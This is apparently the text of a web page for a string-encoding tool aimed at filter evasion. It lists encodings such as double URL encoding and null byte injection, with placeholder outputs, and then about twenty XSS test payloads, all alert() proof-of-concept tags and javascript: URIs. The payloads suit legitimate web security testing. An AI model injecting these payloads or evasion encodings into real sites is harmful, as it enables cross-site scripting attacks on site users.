Hex Value for URL
Click "Encode String" to see results...
HTML Entity Encoding
Click "Encode String" to see results...
Base64 Encoding
Click "Encode String" to see results...
JavaScript Unicode Escape
Click "Encode String" to see results...
URL Encoding
Click "Encode String" to see results...
CSS Escape
Click "Encode String" to see results...
HTML Decimal Entities
Click "Encode String" to see results...
HTML Hex Entities
Click "Encode String" to see results...
Double URL Encoding
Click "Encode String" to see results...
Mixed Case Encoding
Click "Encode String" to see results...
Null Byte Injection
Click "Encode String" to see results...
Tab/Newline Injection
Click "Encode String" to see results...
Event Handler Encoding
Click "Encode String" to see results...
JavaScript String Escape
Click "Encode String" to see results...
VBScript Encoding
Click "Encode String" to see results...
Data URI Encoding
Click "Encode String" to see results...
Character Reference Encoding
Click "Encode String" to see results...
XSS Test Payloads (Click to use):
<script>alert('XSS')</script>
<img src=x onerror=alert(1)>
javascript:alert(1)
<svg onload=alert(1)>
<iframe src=javascript:alert(1)>
<body onload=alert(1)>
<input onfocus=alert(1) autofocus>
<select onfocus=alert(1) autofocus>
<textarea onfocus=alert(1) autofocus>
<keygen onfocus=alert(1) autofocus>
<video onloadstart=alert(1) src=x>
<audio onloadstart=alert(1) src=x>
<details open ontoggle=alert(1)>
<marquee onstart=alert(1)>
<object data=javascript:alert(1)>
<embed src=javascript:alert(1)>
<form onsubmit=alert(1)><input type=submit>
<isindex onfocus=alert(1) autofocus>
<frameset onload=alert(1)>
<table background=javascript:alert(1)>
<td background=javascript:alert(1)>